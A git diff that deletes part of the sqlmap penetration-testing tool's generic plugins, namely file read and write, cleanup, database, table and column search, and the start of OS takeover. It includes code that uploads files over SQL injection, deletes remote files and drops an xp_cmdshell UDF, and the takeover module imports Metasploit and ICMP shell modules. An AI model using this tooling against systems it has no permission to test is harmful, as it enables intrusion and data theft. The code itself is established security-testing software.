= False - - if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): - self.cleanup(onlyFileTbl=True) - elif isListLike(fileContent): - newFileContent = "" - - for chunk in fileContent: - if isListLike(chunk): - if len(chunk) > 0: - chunk = chunk[0] - else: - chunk = "" - - if chunk: - newFileContent += chunk - - fileContent = newFileContent - - if fileContent is not None: - fileContent = decodeHexValue(fileContent, True) - - if fileContent: - localFilePath = dataToOutFile(remoteFile, fileContent) - - if not Backend.isDbms(DBMS.PGSQL): - self.cleanup(onlyFileTbl=True) - - sameFile = self.askCheckReadFile(localFilePath, remoteFile) - - if sameFile is True: - localFilePath += " (same file)" - elif sameFile is False: - localFilePath += " (size differs from remote file)" - - localFilePaths.append(localFilePath) - else: - errMsg = "no data retrieved" - logger.error(errMsg) - - return localFilePaths - - def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): - written = False - - checkFile(localFile) - - self.checkDbmsOs() - - if localFile.endswith('_'): - localFile = decloakToTemp(localFile) - - if conf.direct or isStackingAvailable(): - if isStackingAvailable(): - debugMsg = "going to upload the file '%s' with " % fileType - debugMsg += "stacked query SQL injection technique" - logger.debug(debugMsg) - - written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) - self.cleanup(onlyFileTbl=True) - elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to upload the file '%s' with " % fileType - debugMsg += "UNION query SQL injection technique" - logger.debug(debugMsg) - - written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) - else: - errMsg = "none of the SQL injection techniques detected can " - errMsg += "be used to write files to the underlying file " - errMsg += "system of the back-end %s server" % Backend.getDbms() - logger.error(errMsg) - - return None - - return written diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py deleted file mode 100644 index d8f744c5..00000000 --- a/plugins/generic/fingerprint.py +++ /dev/null @@ -1,58 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import readInput -from lib.core.data import logger -from lib.core.enums import OS -from lib.core.exception import SqlmapUndefinedMethod - -class Fingerprint: - """ - This class defines generic fingerprint functionalities for plugins. - """ - - def __init__(self, dbms): - Backend.forceDbms(dbms) - - def getFingerprint(self): - errMsg = "'getFingerprint' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def checkDbms(self): - errMsg = "'checkDbms' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def checkDbmsOs(self, detailed=False): - errMsg = "'checkDbmsOs' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def forceDbmsEnum(self): - pass - - def userChooseDbmsOs(self): - warnMsg = "for some reason sqlmap was unable to fingerprint " - warnMsg += "the back-end DBMS operating system" - logger.warn(warnMsg) - - msg = "do you want to provide the OS? [(W)indows/(l)inux]" - - while True: - os = readInput(msg, default="W") - - if os[0].lower() == "w": - Backend.setOs(OS.WINDOWS) - break - elif os[0].lower() == "l": - Backend.setOs(OS.LINUX) - break - else: - warnMsg = "invalid value" - logger.warn(warnMsg) diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py deleted file mode 100644 index 143cc18a..00000000 --- a/plugins/generic/misc.py +++ /dev/null @@ -1,212 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import ntpath -import re - -from lib.core.common import Backend -from lib.core.common import hashDBWrite -from lib.core.common import isStackingAvailable -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import posixToNtSlashes -from lib.core.common import readInput -from lib.core.common import singleTimeDebugMessage -from lib.core.common import unArrayizeValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import OS -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject - -class Miscellaneous: - """ - This class defines miscellaneous functionalities for plugins. - """ - - def __init__(self): - pass - - def getRemoteTempPath(self): - if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL): - debugMsg = "identifying Microsoft SQL Server error log directory " - debugMsg += "that sqlmap will use to store temporary files with " - debugMsg += "commands' output" - logger.debug(debugMsg) - - _ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False)) - - if _: - conf.tmpPath = ntpath.dirname(_) - - if not conf.tmpPath: - if Backend.isOs(OS.WINDOWS): - if conf.direct: - conf.tmpPath = "%TEMP%" - else: - self.checkDbmsOs(detailed=True) - - if Backend.getOsVersion() in ("2000", "NT"): - conf.tmpPath = "C:/WINNT/Temp" - elif Backend.isOs("XP"): - conf.tmpPath = "C:/Documents and Settings/All Users/Application Data/Temp" - else: - conf.tmpPath = "C:/Windows/Temp" - else: - conf.tmpPath = "/tmp" - - if re.search(r"\A[\w]:[\/\\]+", conf.tmpPath, re.I): - Backend.setOs(OS.WINDOWS) - - conf.tmpPath = normalizePath(conf.tmpPath) - conf.tmpPath = ntToPosixSlashes(conf.tmpPath) - - singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) - - hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) - - return conf.tmpPath - - def getVersionFromBanner(self): - if "dbmsVersion" in kb.bannerFp: - return - - infoMsg = "detecting back-end DBMS version from its banner" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL): - first, last = 1, 6 - - elif Backend.isDbms(DBMS.PGSQL): - first, last = 12, 6 - - elif Backend.isDbms(DBMS.MSSQL): - first, last = 29, 9 - - else: - raise SqlmapUnsupportedFeatureException("unsupported DBMS") - - query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last) - - if conf.direct: - query = "SELECT %s" % query - - kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) - kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(",", "").replace("-", "").replace(" ", "") - - def delRemoteFile(self, filename): - if not filename: - return - - self.checkDbmsOs() - - if Backend.isOs(OS.WINDOWS): - filename = posixToNtSlashes(filename) - cmd = "del /F /Q %s" % filename - else: - cmd = "rm -f %s" % filename - - self.execCmd(cmd, silent=True) - - def createSupportTbl(self, tblName, tblField, tblType): - inject.goStacked("DROP TABLE %s" % tblName, silent=True) - - if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName: - inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType)) - else: - inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) - - def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): - """ - Cleanup file system and database from sqlmap create files, tables - and functions - """ - - if web and self.webBackdoorFilePath: - logger.info("cleaning up the web files uploaded") - - self.delRemoteFile(self.webStagerFilePath) - self.delRemoteFile(self.webBackdoorFilePath) - - if not isStackingAvailable() and not conf.direct: - return - - if Backend.isOs(OS.WINDOWS): - libtype = "dynamic-link library" - - elif Backend.isOs(OS.LINUX): - libtype = "shared object" - - else: - libtype = "shared library" - - if onlyFileTbl: - logger.debug("cleaning up the database management system") - else: - logger.info("cleaning up the database management system") - - logger.debug("removing support tables") - inject.goStacked("DROP TABLE %s" % self.fileTblName, silent=True) - inject.goStacked("DROP TABLE %shex" % self.fileTblName, silent=True) - - if not onlyFileTbl: - inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) - - if Backend.isDbms(DBMS.MSSQL): - udfDict = {"master..new_xp_cmdshell": None} - - if udfDict is None: - udfDict = self.sysUdfs - - for udf, inpRet in udfDict.items(): - message = "do you want to remove UDF '%s'? [Y/n] " % udf - output = readInput(message, default="Y") - - if not output or output in ("y", "Y"): - dropStr = "DROP FUNCTION %s" % udf - - if Backend.isDbms(DBMS.PGSQL): - inp = ", ".join(i for i in inpRet["input"]) - dropStr += "(%s)" % inp - - logger.debug("removing UDF '%s'" % udf) - inject.goStacked(dropStr, silent=True) - - logger.info("database management system cleanup finished") - - warnMsg = "remember that UDF %s files " % libtype - - if conf.osPwn: - warnMsg += "and Metasploit related files in the temporary " - warnMsg += "folder " - - warnMsg += "saved on the file system can only be deleted " - warnMsg += "manually" - logger.warn(warnMsg) - - def likeOrExact(self, what): - message = "do you want sqlmap to consider provided %s(s):\n" % what - message += "[1] as LIKE %s names (default)\n" % what - message += "[2] as exact %s names" % what - - choice = readInput(message, default='1') - - if not choice or choice == '1': - choice = '1' - condParam = " LIKE '%%%s%%'" - elif choice == '2': - condParam = "='%s'" - else: - errMsg = "invalid value" - raise SqlmapNoneDataException(errMsg) - - return choice, condParam diff --git a/plugins/generic/search.py b/plugins/generic/search.py deleted file mode 100644 index 8686f987..00000000 --- a/plugins/generic/search.py +++ /dev/null @@ -1,606 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import getLimitRange -from lib.core.common import isInferenceAvailable -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import safeStringFormat -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.data import queries -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import CURRENT_DB -from lib.core.settings import METADB_SUFFIX -from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists - -class Search: - """ - This class defines search functionalities for plugins. - """ - - def __init__(self): - pass - - def searchDb(self): - foundDbs = [] - rootQuery = queries[Backend.getIdentifiedDbms()].search_db - dbList = conf.db.split(",") - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - dbCond = rootQuery.inband.condition2 - else: - dbCond = rootQuery.inband.condition - - dbConsider, dbCondParam = self.likeOrExact("database") - - for db in dbList: - values = [] - db = safeSQLIdentificatorNaming(db) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - db = db.upper() - - infoMsg = "searching database" - if dbConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - if conf.excludeSysDbs: - exclDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg) - else: - exclDbsQuery = "" - - dbQuery = "%s%s" % (dbCond, dbCondParam) - dbQuery = dbQuery % unsafeSQLIdentificatorNaming(db) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - - query = query % (dbQuery + exclDbsQuery) - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - values = arrayizeValue(values) - - for value in values: - value = safeSQLIdentificatorNaming(value) - foundDbs.append(value) - - if not values and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of database" - if dbConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 - else: - query = rootQuery.blind.count - - query = query % (dbQuery + exclDbsQuery) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no database" - if dbConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.query2 - else: - query = rootQuery.blind.query - - query = query % (dbQuery + exclDbsQuery) - query = agent.limitQuery(index, query, dbCond) - - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - value = safeSQLIdentificatorNaming(value) - foundDbs.append(value) - - conf.dumper.lister("found databases", foundDbs) - - def searchTable(self): - bruteForce = False - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - bruteForce = True - - if bruteForce: - message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - regex = "|".join(conf.tbl.split(",")) - return tableExists(paths.COMMON_TABLES, regex) - - foundTbls = {} - tblList = conf.tbl.split(",") - rootQuery = queries[Backend.getIdentifiedDbms()].search_table - tblCond = rootQuery.inband.condition - dbCond = rootQuery.inband.condition2 - tblConsider, tblCondParam = self.likeOrExact("table") - - for tbl in tblList: - values = [] - tbl = safeSQLIdentificatorNaming(tbl, True) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD): - tbl = tbl.upper() - - infoMsg = "searching table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - - if dbCond and conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") - whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" - infoMsg += " for database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) - elif conf.excludeSysDbs: - whereDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) - else: - whereDbsQuery = "" - - logger.info(infoMsg) - - tblQuery = "%s%s" % (tblCond, tblCondParam) - tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - - query = query % (tblQuery + whereDbsQuery) - values = inject.getValue(query, blind=False, time=False) - - if values and Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - newValues = [] - - if isinstance(values, basestring): - values = [values] - for value in values: - dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" - newValues.append(["%s%s" % (dbName, METADB_SUFFIX), value]) - - values = newValues - - for foundDb, foundTbl in filterPairValues(values): - foundDb = safeSQLIdentificatorNaming(foundDb) - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) - - if foundDb is None or foundTbl is None: - continue - - if foundDb in foundTbls: - foundTbls[foundDb].append(foundTbl) - else: - foundTbls[foundDb] = [foundTbl] - - if not values and isInferenceAvailable() and not conf.direct: - if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - if len(whereDbsQuery) == 0: - infoMsg = "fetching number of databases with table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.info(infoMsg) - - query = rootQuery.blind.count - query = query % (tblQuery + whereDbsQuery) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no databases have table" - if tblConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query - query = query % (tblQuery + whereDbsQuery) - query = agent.limitQuery(index, query) - - foundDb = unArrayizeValue(inject.getValue(query, union=False, error=False)) - foundDb = safeSQLIdentificatorNaming(foundDb) - - if foundDb not in foundTbls: - foundTbls[foundDb] = [] - - if tblConsider == "2": - foundTbls[foundDb].append(tbl) - - if tblConsider == "2": - continue - else: - for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),): - db = safeSQLIdentificatorNaming(db) - if db not in foundTbls: - foundTbls[db] = [] - else: - dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" - foundTbls["%s%s" % (dbName, METADB_SUFFIX)] = [] - - for db in foundTbls.keys(): - db = safeSQLIdentificatorNaming(db) - - infoMsg = "fetching number of table" - if tblConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) - logger.info(infoMsg) - - query = rootQuery.blind.count2 - if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - query = query % unsafeSQLIdentificatorNaming(db) - query += " AND %s" % tblQuery - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no table" - if tblConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query2 - - if query.endswith("'%s')"): - query = query[:-1] + " AND %s)" % tblQuery - else: - query += " AND %s" % tblQuery - - if Backend.isDbms(DBMS.FIREBIRD): - query = safeStringFormat(query, index) - - if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) - - if not Backend.isDbms(DBMS.FIREBIRD): - query = agent.limitQuery(index, query) - - foundTbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if not isNoneValue(foundTbl): - kb.hintValue = foundTbl - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) - foundTbls[db].append(foundTbl) - - for db in foundTbls.keys(): - if isNoneValue(foundTbls[db]): - del foundTbls[db] - - if not foundTbls: - warnMsg = "no databases contain any of the provided tables" - logger.warn(warnMsg) - return - - conf.dumper.dbTables(foundTbls) - self.dumpFoundTables(foundTbls) - - def searchColumn(self): - bruteForce = False - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - bruteForce = True - - if bruteForce: - message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - regex = '|'.join(conf.col.split(',')) - conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex)) - - message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - - if output and output[0] not in ("n", "N"): - self.dumpAll() - - return - - rootQuery = queries[Backend.getIdentifiedDbms()].search_column - foundCols = {} - dbs = {} - whereDbsQuery = "" - whereTblsQuery = "" - infoMsgTbl = "" - infoMsgDb = "" - colList = conf.col.split(",") - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - origTbl = conf.tbl - origDb = conf.db - colCond = rootQuery.inband.condition - dbCond = rootQuery.inband.condition2 - tblCond = rootQuery.inband.condition3 - colConsider, colCondParam = self.likeOrExact("column") - - for column in colList: - values = [] - column = safeSQLIdentificatorNaming(column) - conf.db = origDb - conf.tbl = origTbl - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - column = column.upper() - - infoMsg = "searching column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) - - foundCols[column] = {} - - if conf.tbl: - _ = conf.tbl.split(",") - whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" - infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(tbl) for tbl in _)) - - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") - whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" - infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in _)) - elif conf.excludeSysDbs: - whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg2) - else: - infoMsgDb = " across all databases" - - logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) - - colQuery = "%s%s" % (colCond, colCondParam) - colQuery = colQuery % unsafeSQLIdentificatorNaming(column) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if not all((conf.db, conf.tbl)): - # Enumerate tables containing the column provided if - # either of database(s) or table(s) is not provided - query = rootQuery.inband.query - query = query % (colQuery + whereDbsQuery + whereTblsQuery) - values = inject.getValue(query, blind=False, time=False) - else: - # Assume provided databases' tables contain the - # column(s) provided - values = [] - - for db in conf.db.split(","): - for tbl in conf.tbl.split(","): - values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)]) - - for db, tbl in filterPairValues(values): - db = safeSQLIdentificatorNaming(db) - tbls = tbl.split(",") if not isNoneValue(tbl) else [] - - for tbl in tbls: - tbl = safeSQLIdentificatorNaming(tbl, True) - - if db is None or tbl is None: - continue - - conf.db = db - conf.tbl = tbl - conf.col = column - - self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - - if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: - if db not in dbs: - dbs[db] = {} - - if tbl not in dbs[db]: - dbs[db][tbl] = {} - - dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) - - if db in foundCols[column]: - foundCols[column][db].append(tbl) - else: - foundCols[column][db] = [tbl] - - kb.data.cachedColumns = {} - - if not values and isInferenceAvailable() and not conf.direct: - if not conf.db: - infoMsg = "fetching number of databases with tables containing column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) - logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) - - query = rootQuery.blind.count - query = query % (colQuery + whereDbsQuery + whereTblsQuery) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no databases have tables containing column" - if colConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) - logger.warn("%s%s" % (warnMsg, infoMsgTbl)) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query - query = query % (colQuery + whereDbsQuery + whereTblsQuery) - query = agent.limitQuery(index, query) - - db = unArrayizeValue(inject.getValue(query, union=False, error=False)) - db = safeSQLIdentificatorNaming(db) - - if db not in dbs: - dbs[db] = {} - - if db not in foundCols[column]: - foundCols[column][db] = [] - else: - for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),): - db = safeSQLIdentificatorNaming(db) - if db not in foundCols[column]: - foundCols[column][db] = [] - - origDb = conf.db - origTbl = conf.tbl - - for column, dbData in foundCols.items(): - colQuery = "%s%s" % (colCond, colCondParam) - colQuery = colQuery % unsafeSQLIdentificatorNaming(column) - - for db in dbData: - conf.db = origDb - conf.tbl = origTbl - - infoMsg = "fetching number of tables containing column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) - logger.info(infoMsg) - - query = rootQuery.blind.count2 - query = query % unsafeSQLIdentificatorNaming(db) - query += " AND %s" % colQuery - query += whereTblsQuery - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no tables contain column" - if colConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query2 - - if query.endswith("'%s')"): - query = query[:-1] + " AND %s)" % (colQuery + whereTblsQuery) - else: - query += " AND %s" % (colQuery + whereTblsQuery) - - query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) - query = agent.limitQuery(index, query) - - tbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) - kb.hintValue = tbl - - tbl = safeSQLIdentificatorNaming(tbl, True) - - conf.db = db - conf.tbl = tbl - conf.col = column - - self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - - if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: - if db not in dbs: - dbs[db] = {} - - if tbl not in dbs[db]: - dbs[db][tbl] = {} - - dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) - - kb.data.cachedColumns = {} - - if db in foundCols[column]: - foundCols[column][db].append(tbl) - else: - foundCols[column][db] = [tbl] - - if dbs: - conf.dumper.dbColumns(foundCols, colConsider, dbs) - self.dumpFoundColumn(dbs, foundCols, colConsider) - else: - warnMsg = "no databases have tables containing any of the " - warnMsg += "provided columns" - logger.warn(warnMsg) - - def search(self): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - for item in ('db', 'tbl', 'col'): - if getattr(conf, item, None): - setattr(conf, item, getattr(conf, item).upper()) - - if conf.col: - self.searchColumn() - elif conf.tbl: - self.searchTable() - elif conf.db: - self.searchDb() - else: - errMsg = "missing parameter, provide -D, -T or -C along " - errMsg += "with --search" - raise SqlmapMissingMandatoryOptionException(errMsg) diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py deleted file mode 100644 index 390ce92f..00000000 --- a/plugins/generic/syntax.py +++ /dev/null @@ -1,38 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.exception import SqlmapUndefinedMethod - -class Syntax: - """ - This class defines generic syntax functionalities for plugins. - """ - - def __init__(self): - pass - - @staticmethod - def _escape(expression, quote=True, escaper=None): - retVal = expression - - if quote: - for item in re.findall(r"'[^']*'+", expression, re.S): - _ = item[1:-1] - if _: - retVal = retVal.replace(item, escaper(_)) - else: - retVal = escaper(expression) - - return retVal - - @staticmethod - def escape(expression, quote=True): - errMsg = "'escape' method must be defined " - errMsg += "inside the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py deleted file mode 100644 index 1e35307a..00000000 --- a/plugins/generic/takeover.py +++ /dev/null @@ -1,473 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import Backend -from lib.core.common import isStackingAvailable -from lib.core.common import readInput -from lib.core.common import runningAsAdmin -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapMissingDependence -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.exception import SqlmapUndefinedMethod -from lib.core.exception import SqlmapUnsupportedDBMSException -from lib.takeover.abstraction import Abstraction -from lib.takeover.icmpsh import ICMPsh -from lib.takeover.metasploit import Metasploit -from lib.takeover.registry import Registry - -from plugins.generic.misc import Miscellaneous - -class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): - """ - This class defines generic OS takeover functionalities for plugins. - """ - - def __init__(self): - self.cmdTblName = "sqlmapoutput" - self.tblField = "data" - - Abstraction.__init__(self) - - def osCmd(self): - if isStackingAvailable() or conf.direct: 